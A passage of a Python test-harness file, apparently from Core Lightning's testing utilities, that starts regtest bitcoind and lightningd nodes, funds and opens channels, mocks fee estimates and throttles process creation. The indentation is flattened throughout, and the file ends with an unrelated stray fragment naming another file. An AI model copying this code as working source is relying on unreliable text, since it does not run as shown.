# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
try:
self.rpc.createwallet("lightningd-tests")
except JSONRPCError:
self.rpc.loadwallet("lightningd-tests")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
    # True := wait for at least 1 transaction
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
mempool = self.rpc.getrawmempool()
logging.debug("Generating {numblocks}, confirming {lenmempool} transactions: {mempool}".format(
numblocks=numblocks,
mempool=mempool,
lenmempool=len(mempool),
))
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
        Note that tx's that become invalid at [height] (because of coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
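    # Usage sketch (illustrative heights): simple_reorg(height=102, shift=1)
    # invalidates block 102, mines one block while the evicted transactions are
    # deprioritised, then re-mines them so the new tip is at least old_tip + 1.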
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-nowallet',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': '{}'.format("true" if DEPRECATED_APIS
else "false"),
'network': TEST_NETWORK,
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
# Make sure we don't touch any existing config files in the user's $HOME
'bitcoin-datadir': lightning_dir,
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(os.path.join(lightning_dir, TEST_NETWORK)):
os.makedirs(os.path.join(lightning_dir, TEST_NETWORK))
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, TEST_NETWORK, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-fast-gossip'] = None
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self, stdin=None, stdout=None, stderr=None,
wait_for_initialized=True):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self, stdin, stdout, stderr)
if wait_for_initialized:
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
        try:
            self.proc.wait(timeout)
        except subprocess.TimeoutExpired:
            return None
        return self.proc.returncode
class PrettyPrintingLightningRpc(LightningRpc):
"""A version of the LightningRpc that pretty-prints calls and results.
Useful when debugging based on logs, and less painful to the
eyes. It has some overhead since we re-serialize the request and
result to json in order to pretty print it.
Also validates (optional) schemas for us.
"""
def __init__(self, socket_path, executor=None, logger=logging,
patch_json=True, jsonschemas={}):
super().__init__(
socket_path,
executor,
logger,
patch_json,
)
self.jsonschemas = jsonschemas
def call(self, method, payload=None):
id = self.next_id
self.logger.debug(json.dumps({
"id": id,
"method": method,
"params": payload
}, indent=2))
res = LightningRpc.call(self, method, payload)
self.logger.debug(json.dumps({
"id": id,
"result": res
}, indent=2))
if method in self.jsonschemas:
self.jsonschemas[method].validate(res)
return res
class LightningNode(object):
def __init__(self, node_id, lightning_dir, bitcoind, executor, valgrind, may_fail=False,
may_reconnect=False,
allow_broken_log=False,
allow_warning=False,
allow_bad_gossip=False,
db=None, port=None, disconnect=None, random_hsm=None, options=None,
jsonschemas={},
**kwargs):
self.bitcoin = bitcoind
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
self.allow_broken_log = allow_broken_log
self.allow_bad_gossip = allow_bad_gossip
self.allow_warning = allow_warning
self.db = db
# Assume successful exit
self.rc = 0
socket_path = os.path.join(lightning_dir, TEST_NETWORK, "lightning-rpc").format(node_id)
self.rpc = PrettyPrintingLightningRpc(socket_path, self.executor, jsonschemas=jsonschemas)
self.daemon = LightningD(
lightning_dir, bitcoindproxy=bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
self.daemon.disconnect_file = os.path.join(lightning_dir, TEST_NETWORK, "dev_disconnect")
with open(self.daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
self.daemon.opts["dev-disconnect"] = "dev_disconnect"
if DEVELOPER:
self.daemon.opts["dev-fail-on-subdaemon-fail"] = None
# Don't run --version on every subdaemon if we're valgrinding and slow.
if SLOW_MACHINE and VALGRIND:
self.daemon.opts["dev-no-version-checks"] = None
if os.getenv("DEBUG_SUBD"):
self.daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if valgrind:
self.daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
else:
# Under valgrind, scanning can access uninitialized mem.
self.daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if not may_reconnect:
self.daemon.opts["dev-no-reconnect"] = None
if EXPERIMENTAL_DUAL_FUND:
self.daemon.opts["experimental-dual-fund"] = None
if options is not None:
self.daemon.opts.update(options)
dsn = db.get_dsn()
if dsn is not None:
self.daemon.opts['wallet'] = dsn
if valgrind:
self.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*,*elements-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(self.daemon.lightning_dir)
]
# Reduce precision of errors, speeding startup and reducing memory greatly:
if SLOW_MACHINE:
self.daemon.cmd_prefix += ['--read-inline-info=no']
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity=FUNDAMOUNT, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit", mine_block=True):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
if mine_block:
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def fundbalancedchannel(self, remote_node, total_capacity, announce=True):
'''
Creates a perfectly-balanced channel, as all things should be.
'''
if isinstance(total_capacity, Millisatoshi):
total_capacity = int(total_capacity.to_satoshi())
else:
total_capacity = int(total_capacity)
self.fundwallet(total_capacity + 10000)
if remote_node.config('experimental-dual-fund'):
remote_node.fundwallet(total_capacity + 10000)
# We cut the total_capacity in half, since the peer's
# expected to contribute that same amount
chan_capacity = total_capacity // 2
total_capacity = chan_capacity * 2
# Tell the node to equally dual-fund the channel
remote_node.rpc.call('funderupdate', {'policy': 'match',
'policy_mod': 100,
'fuzz_percent': 0})
else:
chan_capacity = total_capacity
self.rpc.connect(remote_node.info['id'], 'localhost', remote_node.port)
# Make sure the fundchannel is confirmed.
num_tx = len(self.bitcoin.rpc.getrawmempool())
res = self.rpc.fundchannel(remote_node.info['id'], chan_capacity, feerate='slow', minconf=0, announce=announce, push_msat=Millisatoshi(chan_capacity * 500))
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
blockid = self.bitcoin.generate_block(1)[0]
# Generate the scid.
outnum = get_tx_p2wsh_outnum(self.bitcoin, res['tx'], total_capacity)
if outnum is None:
raise ValueError("no outnum found. capacity {} tx {}".format(total_capacity, res['tx']))
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
return '{}x{}x{}'.format(self.bitcoin.rpc.getblockcount(), txnum, outnum)
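    # Note: the value returned above is the short channel id in the usual
    # "<blockheight>x<txindex>x<outnum>" form, e.g. (illustrative) "103x1x0".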
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query):
return self.db.query(query)
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, TEST_NETWORK, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def is_synced_with_bitcoin(self, info=None):
if info is None:
info = self.rpc.getinfo()
return 'warning_bitcoind_sync' not in info and 'warning_lightningd_sync' not in info
def start(self, wait_for_bitcoind_sync=True, stderr=None):
self.daemon.start(stderr=stderr)
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
if wait_for_bitcoind_sync and not self.is_synced_with_bitcoin(self.info):
wait_for(lambda: self.is_synced_with_bitcoin())
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
self.rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if self.rc is None:
self.rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if self.rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(self.rc))
else:
return self.rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True, announce_channel=True):
warnings.warn("LightningNode.fund_channel is deprecated in favor of "
"LightningNode.fundchannel", category=DeprecationWarning)
return self.fundchannel(l2, amount, wait_for_active, announce_channel)
def fundchannel(self, l2, amount=FUNDAMOUNT, wait_for_active=True,
announce_channel=True, **kwargs):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
def has_funds_on_addr(addr):
"""Check if the given address has funds in the internal wallet.
"""
outs = self.rpc.listfunds()['outputs']
addrs = [o['address'] for o in outs]
return addr in addrs
# We should not have funds on that address yet, we just generated it.
assert(not has_funds_on_addr(addr))
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
self.bitcoin.generate_block(1)
# Now we should.
wait_for(lambda: has_funds_on_addr(addr))
# Now go ahead and open a channel
res = self.rpc.fundchannel(l2.info['id'], amount,
announce=announce_channel,
**kwargs)
wait_for(lambda: res['txid'] in self.bitcoin.rpc.getrawmempool())
blockid = self.bitcoin.generate_block(1)[0]
for i, txid in enumerate(self.bitcoin.rpc.getblock(blockid)['tx']):
if txid == res['txid']:
txnum = i
scid = "{}x{}x{}".format(self.bitcoin.rpc.getblockcount(),
txnum, res['outnum'])
if wait_for_active:
self.wait_channel_active(scid)
l2.wait_channel_active(scid)
return scid, res
def subd_pid(self, subd, peerid=None):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
if peerid:
ex = re.compile(r'{}-.*{}.*: pid ([0-9]*),'
.format(peerid, subd))
else:
ex = re.compile('{}-.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def get_channel_id(self, other):
"""Get the channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels(chanid)['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
# This helper waits for all HTLCs to settle
# `scids` can be a list of strings. If unset wait on all channels.
def wait_for_htlcs(self, scids=None):
peers = self.rpc.listpeers()['peers']
for p, peer in enumerate(peers):
if 'channels' in peer:
for c, channel in enumerate(peer['channels']):
if scids is not None and channel['short_channel_id'] not in scids:
continue
if 'htlcs' in channel:
wait_for(lambda: len(self.rpc.listpeers()['peers'][p]['channels'][c]['htlcs']) == 0)
# This sends money to a directly connected peer
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
# check we are connected
dst_id = dst.info['id']
assert len(self.rpc.listpeers(dst_id).get('peers')) == 1
# make an invoice
inv = dst.rpc.invoice(amt, label, label)
# FIXME: pre 0.10.1 invoice calls didn't have payment_secret field
psecret = dst.rpc.decodepay(inv['bolt11'])['payment_secret']
rhash = inv['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst_id,
'delay': 5,
'channel': '1x1x1' # note: can be bogus for 1-hop direct payments
}
# sendpay is async now
self.rpc.sendpay([routestep], rhash, payment_secret=psecret)
# wait for sendpay to comply
result = self.rpc.waitsendpay(rhash)
assert(result.get('status') == 'complete')
# This helper sends all money to a peer until even 1 msat can't get through.
def drain(self, peer):
total = 0
msat = 4294967295 # Max payment size in some configs
while msat != 0:
try:
logging.debug("Drain step with size={}".format(msat))
self.pay(peer, msat)
total += msat
except RpcError as e:
logging.debug("Got an exception while draining channel: {}".format(e))
msat //= 2
logging.debug("Draining complete after sending a total of {}msats".format(total))
return total
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [6, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [12, 'ECONOMICAL']:
feerate = feerates[2] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[3] * 4
else:
warnings.warn("Don't have a feerate set for {}/{}.".format(
params[0], params[1],
))
feerate = 42
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda:
self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 4)
# force new feerates by restarting and thus skipping slow smoothed process
# Note: testnode must be created with: opts={'may_reconnect': True}
def force_feerates(self, rate):
assert(self.may_reconnect)
self.set_feerates([rate] * 4, False)
self.restart()
self.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
assert(self.rpc.feerates('perkw')['perkw']['opening'] == rate)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def query_gossip(self, querytype, *args, filters=[]):
"""Generate a gossip query, feed it into this node and get responses
in hex"""
query = subprocess.run(['devtools/mkquery',
querytype] + [str(a) for a in args],
check=True,
timeout=TIMEOUT,
stdout=subprocess.PIPE).stdout.strip()
out = subprocess.run(['devtools/gossipwith',
'--timeout-after={}'.format(int(math.sqrt(TIMEOUT) + 1)),
'{}@localhost:{}'.format(self.info['id'],
self.port),
query],
check=True,
timeout=TIMEOUT, stdout=subprocess.PIPE).stdout
def passes_filters(hmsg, filters):
for f in filters:
if hmsg.startswith(f):
return False
return True
msgs = []
while len(out):
length = struct.unpack('>H', out[0:2])[0]
hmsg = out[2:2 + length].hex()
if passes_filters(hmsg, filters):
msgs.append(out[2:2 + length].hex())
out = out[2 + length:]
return msgs
def config(self, config_name):
try:
opt = self.rpc.listconfigs(config_name)
return opt[config_name]
except RpcError:
return None
@contextmanager
def flock(directory: Path):
"""A fair filelock, based on atomic fs operations.
"""
if not isinstance(directory, Path):
directory = Path(directory)
d = directory / Path(".locks")
os.makedirs(str(d), exist_ok=True)
fname = None
while True:
# Try until we find a filename that doesn't exist yet.
try:
fname = d / Path("lock-{}".format(time.time()))
fd = os.open(str(fname), flags=os.O_CREAT | os.O_EXCL)
os.close(fd)
break
except FileExistsError:
time.sleep(0.1)
# So now we have a position in the lock, let's check if we are the
# next one to go:
while True:
files = sorted([f.resolve() for f in d.iterdir() if f.is_file()])
# We're queued, so it should at least have us.
assert len(files) >= 1
if files[0] == fname:
break
time.sleep(0.1)
# We can continue
yield fname
# Remove our file, so the next one can go ahead.
fname.unlink()
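# Usage sketch (illustrative directory): flock() is a fair, filesystem-based
# lock; waiters queue by creating timestamped files and proceed in order:
#
#     with flock("/tmp/pyln-shared-dir"):
#         ...  # critical section, e.g. spawning an expensive process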
class Throttler(object):
"""Throttles the creation of system-processes to avoid overload.
There is no reason to overload the system with too many processes
being spawned or run at the same time. It causes timeouts by
aggressively preempting processes and swapping if the memory limit is
reached. In order to reduce this loss of performance we provide a
`wait()` method which will serialize the creation of processes, but
also delay if the system load is too high.
Notice that technically we are throttling too late, i.e., we react
to an overload, but chances are pretty good that some other
already running process is about to terminate, and so the overload
is short-lived. We throttle when the process object is first
created, not when restarted, in order to avoid delaying running
tests, which could cause more timeouts.
"""
def __init__(self, directory: str, target: float = 90):
"""If specified we try to stick to a load of target (in percent).
"""
self.target = target
self.current_load = self.target # Start slow
psutil.cpu_percent() # Prime the internal load metric
self.directory = directory
def wait(self):
start_time = time.time()
with flock(self.directory):
# We just got the lock, assume someone else just released it
self.current_load = 100
while self.load() >= self.target:
time.sleep(1)
self.current_load = 100 # Back off slightly to avoid triggering right away
print("Throttler delayed startup for {} seconds".format(time.time() - start_time))
def load(self):
"""An exponential moving average of the load
"""
decay = 0.5
load = psutil.cpu_percent()
self.current_load = decay * load + (1 - decay) * self.current_load
return self.current_load
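# Usage sketch (illustrative): NodeFactory calls Throttler.wait() before each
# node spawn; standalone it can gate any expensive startup:
#
#     throttler = Throttler("/tmp/pytest-shared", target=90)
#     throttler.wait()   # returns once the smoothed CPU load drops below ~90%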
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, request, testname, bitcoind, executor, directory,
db_provider, node_cls, throttler, jsonschemas):
if request.node.get_closest_marker("slow_test") and SLOW_MACHINE:
self.valgrind = False
else:
self.valgrind = VALGRIND
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
self.db_provider = db_provider
self.node_cls = node_cls
self.throttler = throttler
self.jsonschemas = jsonschemas
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'allow_broken_log',
'allow_warning',
'may_reconnect',
'random_hsm',
'feerates',
'wait_for_bitcoind_sync',
'allow_bad_gossip',
'start',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, node_id=None, options=None, dbfile=None,
feerates=(15000, 11000, 7500, 3750), start=True,
wait_for_bitcoind_sync=True, may_fail=False,
expect_fail=False, cleandir=True, **kwargs):
self.throttler.wait()
node_id = self.get_node_id() if not node_id else node_id
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if cleandir and os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
# Get the DB backend DSN we should be using for this test and this
# node.
db = self.db_provider.get_db(os.path.join(lightning_dir, TEST_NETWORK), self.testname, node_id)
node = self.node_cls(
node_id, lightning_dir, self.bitcoind, self.executor, self.valgrind, db=db,
port=port, options=options, may_fail=may_fail or expect_fail,
jsonschemas=self.jsonschemas,
**kwargs
)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, TEST_NETWORK,
'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
# Capture stderr if we're failing
if expect_fail:
stderr = subprocess.PIPE
else:
stderr = None
node.start(wait_for_bitcoind_sync, stderr=stderr)
except Exception:
if expect_fail:
return node
node.daemon.stop()
raise
return node
def join_nodes(self, nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, announce_channels=True) -> None:
"""Given nodes, connect them in a line, optionally funding a channel"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
connections = [(nodes[i], nodes[i + 1]) for i in range(len(nodes) - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log(r'{}-.*-chan#[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return
bitcoind = nodes[0].bitcoin
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
bitcoind.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
txids = []
for src, dst in connections:
txids.append(src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)['txid'])
wait_for(lambda: set(txids).issubset(set(bitcoind.rpc.getrawmempool())))
# Confirm all channels and wait for them to become usable
bitcoind.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
scids.append(scid)
# Wait for all channels to be active (locally)
for i, n in enumerate(scids):
nodes[i].wait_channel_active(scids[i])
nodes[i + 1].wait_channel_active(scids[i])
if not wait_for_announce:
return
bitcoind.generate_block(5)
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
nodes[0].wait_channel_active(scids[-1])
nodes[-1].wait_channel_active(scids[0])
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
def line_graph(self, num_nodes, fundchannel=True, fundamount=FUNDAMOUNT, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
self.join_nodes(nodes, fundchannel, fundamount, wait_for_announce, announce_channels)
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
err_msgs = []
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not self.valgrind and DEVELOPER:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
unexpected_fail = True
err_msgs.append("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail, err_msgs
|
rdma.py
|
# Windows Azure Linux Agent
